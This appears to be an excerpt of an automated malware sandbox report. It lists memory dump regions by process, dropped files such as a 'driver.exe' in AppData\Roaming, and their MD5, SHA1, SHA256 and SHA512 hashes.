SHA512 c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

memory/4420-33-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-34-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4420-35-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4420-36-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4440-46-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4440-47-0x000002516FF50000-0x000002516FF60000-memory.dmp

memory/4440-48-0x000002516FF50000-0x000002516FF60000-memory.dmp

memory/4440-49-0x0000025170570000-0x00000251705B4000-memory.dmp

memory/4440-50-0x0000025170640000-0x00000251706B6000-memory.dmp

memory/2844-51-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-52-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-54-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4420-55-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4440-56-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4440-57-0x000002516FF50000-0x000002516FF60000-memory.dmp

C:\Users\Admin\AppData\Roaming\driver.exe

MD5 79ac171749690f2c947187e34d2b007d
SHA1 ebe8d99c87b7b6b51af10a1260271f7282c8f8d2
SHA256 cdb5f26a44a64a81c8e96db60ba2f4471f88b3980d14f91d3247a0afde34d441
SHA512 c93009d5e20a8ac008e409ad677674aeacc383f0716904825847330ad12ea7347d706754f9c8724e69c0261f2edcb36a41e40f851014e51021b1bccbf7a15f54

C:\Users\Admin\AppData\Roaming\driver.exe

MD5 45ff32c8f82fd612116ebd1b20fa1c19
SHA1 de91cdfa4b34d5526b2d99ad2cdd9f6e465b205e
SHA256 864ed84452a92ae76f154f7abc10540674d5d4490c7c5202329c765ee80c3ae2
SHA512 e0fe7ec8bd84b32d352f9866339b8a589b8c95ec830d3b949162aa752e0f6cb74f9ec904493a727702b471226fdc156658319165443bc4faddabe837365f2992

memory/4440-69-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-72-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/2228-74-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/2228-73-0x0000000000B20000-0x0000000000B70000-memory.dmp

C:\Users\Admin\Videos\Captures\desktop.ini

MD5 b0d27eaec71f1cd73b015f5ceeb15f9d
SHA1 62264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA256 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA512 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

memory/1624-91-0x0000000000400000-0x0000000000449000-memory.dmp

memory/1624-94-0x0000000000400000-0x0000000000449000-memory.dmp

memory/2228-96-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/2228-97-0x0000000003060000-0x0000000005060000-memory.dmp

memory/1624-98-0x00000000012D0000-0x00000000012D1000-memory.dmp

memory/1624-100-0x00000000012D0000-0x00000000012D1000-memory.dmp

memory/1624-99-0x00000000012D0000-0x00000000012D1000-memory.dmp

memory/1624-101-0x0000000000400000-0x0000000000449000-memory.dmp

memory/2228-102-0x0000000003060000-0x0000000005060000-memory.dmp